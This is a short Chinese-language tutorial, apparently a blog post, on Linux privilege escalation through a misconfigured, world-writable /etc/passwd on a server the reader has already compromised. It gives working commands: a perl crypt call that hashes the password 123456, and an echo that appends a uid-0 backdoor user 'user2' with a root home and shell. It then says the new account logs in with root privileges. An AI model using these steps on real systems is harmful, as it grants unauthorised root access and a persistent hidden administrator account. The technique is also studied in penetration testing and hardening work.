Linux提权—/etc/passwd

        当我们拿到一个服务器之后，发现得到的权限是一个低权限的账号，这是我们为了得到更多的信息，就需要对权限做一个提升。

利用/etc/passwd 提权的前提条件是拥有写的权限，有时候有些运维人员大意导致其他设置权限时导致/etc/passwd拥有写的权限

假如我们拿下了一个服务器，发现他的etc/passwd拥有其他用户写的权限

此时我们可以通过编辑etc/passwd来添加用户。我们指定一个用户，在密码占位符后指定密码，并将uid设置为0。并将其添加到/etc/passwd中

首先，使用perl语言生成带有盐值的密码，此地的123456便是我们要加盐的密码

perl -le 'print crypt("123456","addedsalt")'

然后将有需要的用户user2添加到/etc/passwd中

echo "user2:adrla7IBSfTZQ:0:0:User_like_root:/root:/bin/bash" >>/etc/passwd

 

 我们查看一下/etc/passwd文件，发现我们添加的用户已经写入

 我们尝试进行登录用户user2，密码是我们设置的123456，发现我们创建的用户user2，是以root的权限在登录